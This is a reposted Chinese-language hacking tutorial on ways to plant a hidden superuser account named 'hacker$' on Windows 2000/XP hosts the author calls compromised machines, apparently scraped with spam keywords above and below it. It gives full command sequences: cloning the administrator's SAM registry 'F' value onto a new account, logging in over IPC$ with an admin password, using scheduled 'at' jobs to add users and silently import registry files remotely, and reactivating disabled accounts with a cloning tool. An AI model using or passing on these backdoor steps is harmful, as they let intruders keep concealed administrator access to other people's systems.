国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 系統 > Windows > 正文

系統中多種隱藏超級用戶administrator的方法

2019-11-28 03:10:56
字體:
來源:轉載
供稿:網友

   一、如何在圖形界面建立隱藏的超級用戶

  圖形界面下適用本地或開3389終端服務的肉雞上。上面我提到的那位作者說的方法很好,但是較為復雜,還要用到psu.exe(讓程序以系統用戶身份運行的程序),如果在肉雞上的話還要上傳psu.exe。我說的這個方法將不用到psu.exe這個程序。因為Windows2000有兩個注冊表編輯器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe實為一個程序,修改鍵值的權限時在右鍵中點“權限”來修改。對regedit.exe我想大家都很熟悉,但卻不能對注冊表的項鍵設置權限,而regedt32.exe最大的優點就是能夠對注冊表的項鍵設置權限。NT/2000/xp的帳戶信息都在注冊表的HKEY_LOCAL_MACHINESAMSAM鍵下,但是除了系統用戶SYSTEM外,其它用戶都無權查看到里面的信息,因此我首先用regedt32.exe對SAM鍵為我設置為“完全控制”權限。這樣就可以對SAM鍵內的信息進行讀寫了了。具體步聚如下:

  1、假設我們是以超級用戶administrator登錄到開有終端服務的肉雞上的,首先在命令行下或帳戶管理器中建立一個帳戶:hacker$,這里我在命令行下建立這個帳戶

  net user hacker$ 1234 /add

  2、在開始/運行中輸入:regedt32.exe并回車來運行regedt32.exe。

  3、點“權限”以后會彈出窗口

  點添加將我登錄時的帳戶添加到安全欄內,這里我是以administrator的身份登錄的,所以我就將administrator加入,并設置權限為“完全控制”。這里需要說明一下:最好是添加你登錄的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將會帶來一系列不必要的問題。等隱藏超級用戶建好以,再來這里將你添加的帳戶刪除即可。

  4、再點“開始”→“運行”并輸入“regedit.exe”回車,啟動注冊表編輯器regedit.exe。打開鍵:

  HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"

  5、將項hacker$、00000409、000001F4導出為hacker.reg、409.reg、1f4.reg,用記事本分別打這幾個導出的文件進行編輯,將超級用戶對應的項000001F4下的鍵“F”的值復制,并覆蓋hacker$對應的項00000409下的鍵“F”的值,然后再將00000409.reg與hacker.reg合并。

  6、在命令行下執行net user hacker$ /del將用戶hacker$刪除:

  net user hacker$ /del

  7、在regedit.exe的窗口內按F5刷新,然后打文件-導入注冊表文件將修改好的hacker.reg導入注冊表即可

  8、到此,隱藏的超級用戶hacker$已經建好了,然后關閉regedit.exe。在regedt32.exe窗口內把HKEY_LOCAL_MACHINESAMSAM鍵權限改回原來的樣子(只要刪除添加的帳戶administrator即可)。

  9、注意:隱藏的超級用戶建好后,在帳戶管理器看不到hacker$這個用戶,在命令行用“net user”命令也看不到,但是超級用戶建立以后,就不能再改密碼了,如果用net user命令來改hacker$的密碼的話,那么在帳戶管理器中將又會看這個隱藏的超級用戶了,而且不能刪除。

  二、如何在命令行下遠程建立隱藏的超級用戶

  在這里將用at的命令,因為用at產生的計劃任務是以系統身份運行的,所以也用不到psu.exe程序。為了能夠使用at命令,肉雞必須開有schedule的服務,如果沒有開啟,可用流光里帶的工具netsvc.exe或sc.exe來遠程啟動,當然其方法也可以,只要能啟動schedule服務就行。

  對于命令行方式,你可以采用各種連接方式,如用SQLexec連接MSSQL的1433端口,也可以用telnet服務,只要以你能得到一個cmdshell,并且有運行at命令的權限就可以。

  1、首先找到一臺肉雞,至于如何來找那不是我這里所說的話題。這里先假設找到一臺超級用戶為administrator,密碼為12345678的肉雞,現在我們開始在命令行下遠程為它建立隱藏的超級用戶。(例子中的主機是我的局域網內的一臺主機,我將它的ip地址改為13.50.97.238,,請勿在互聯網上對號入座,以免騷擾正常的ip地址。)

  2、先與肉雞建立連接,命令為:net use 13.50.97.238ipc$ "12345678" /user:"administrator

  3、用at命令在肉雞上建立一個用戶(如果at服務沒有啟動,可用小榕的netsvc.exe或sc.exe來遠程啟動):

  at 13.50.97.238 12:51 c:/winntsystem32net.exe user hacker$ 1234 /add

  建立這個加有$符的用戶名,是因為加有$符后,命令行下用net user將不顯示這個用戶,但在帳戶管理器卻能看到這個用戶。

  4、同樣用at命令導出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下鍵值:

  at 13.50.97.238 12:55 c:/winntregedit.exe /e hacker.reg

  HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers

  /e 是regedit.exe的參數,在_LOCAL_MACHINESAMSAMDomainsaccountusers這個鍵的一定要以結尾。必要的情況下可以用引號將“c:/winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”引起來。

  5、將肉雞上的hacker.reg下載到本機上用記事本打開進行編輯命令為:

  copy 13.50.97.238admin$system32hacker.reg c:/hacker.reg

  修改的方法圖形界中已經介紹過了,這里就不作介紹了。

  6、再將編輯好的hacker.reg拷回肉雞上

  copy c:/hacker.reg 13.50.97.238admin$system32hacker1.reg

  7、查看肉雞時間:net time 13.50.97.238 然后用at命令將用戶hacker$刪除:

  at 13.50.97.238 13:40 net user hacker$ /del

  8、驗證hacker$是否刪除:用

  net use 13.50.97.238 /del 斷開與肉雞的連接。

  net use 13.50.97.238ipc$ "1234" /user:"hacker$" 用帳戶hacker$與肉雞連接,不能連接說明已刪除。

  9、再與肉雞建立連接:net use 13.50.97.238ipc$ "12345678" /user:"administrator"

  再取得肉雞時間,用at命令將拷回肉雞的hacker1.reg導入肉雞注冊表:

  at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg

  regedit.exe的參數/s是指安靜模式。

  10、再驗證hacker$是否已建立,方法同上面驗證hacker$是否被刪除一樣。

  11、再驗證用戶hacker$是否有讀、寫、刪的權限,如果不放心,你還可驗證是否能建立其它帳戶。

  12、通過11可以斷定用戶hacker$具有超級用戶權限,因為最初我用at命令建立它的時候是一個普通用戶,而現在卻具有遠程讀、寫、刪的權限。

  三、如果肉雞沒有開3389終端服務,而我又不想用命令行,怎么辦?

  這種情況下,你也可以用界面方式來遠程為肉雞建立隱藏的超級用戶。因為regedit.exe、regedt32.exe都有連接網絡注冊表的功能,你可以用regedt32.exe來為遠程主機的注冊表項設置權限,用regedit.exe來編輯遠程注冊表。帳戶管理器也有一項連另一臺計算機的功能,你可以用帳戶管理器為遠程主機建立和刪除帳戶。具體步聚與上面介紹的相似,我就不多說了,只它的速度實在是令人難以忍受。

  是這里有兩個前提:1、先用net use 肉雞ipipc$ "密碼" /user:"超級用戶名"來與遠程主機建立連接以后,才能用regedit.exe regedt32.exe及帳戶管理器與遠程主機連接。

  2、遠程主機必須開啟遠程注冊表服務(沒有開啟的話,你也可以遠程開啟,因為你有超級用戶的密碼了)。

  四、利用被禁用的帳戶建立隱藏的超級用戶

  1、想辦查看有哪些用戶被細心的管理員禁止,一般情況下,有些管理員出于安全考慮,通常會將guest禁用,當然了會禁用其它用戶。在圖形界面下,非常容易,只要在帳戶管理器中就可以看到被禁用的帳戶上有一個紅叉;而在命令行下,我還沒有想到好的辦法,只能在命令行下用命令:“net user 用戶名”一個一個來查看用戶是否被禁用。

  2.在這里,我們假設用戶hacker被管理員禁用。首先,我先用小榕的超組用戶克隆程序CA.exe,將被禁用的用戶hacker 克隆成超級用戶(克隆之后,被禁用的用戶hacker就會自動被激活了): CA.EXE 肉雞ip Administrator 超級用戶密碼 hacher hacher密碼。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 连云港市| 雅安市| 江山市| 贵溪市| 曲麻莱县| 保山市| 南靖县| 尉犁县| 仙桃市| 和田县| 华宁县| 兖州市| 岑巩县| 金川县| 梁山县| 聂拉木县| 贵港市| 临汾市| 曲靖市| 文安县| 宁都县| 仙桃市| 中方县| 威信县| 普兰县| 长阳| 凉城县| 顺平县| 兴仁县| 慈利县| 昌黎县| 唐山市| 清水河县| 美姑县| 舞阳县| 武胜县| 滦平县| 丰宁| 聂拉木县| 庄浪县| 华坪县|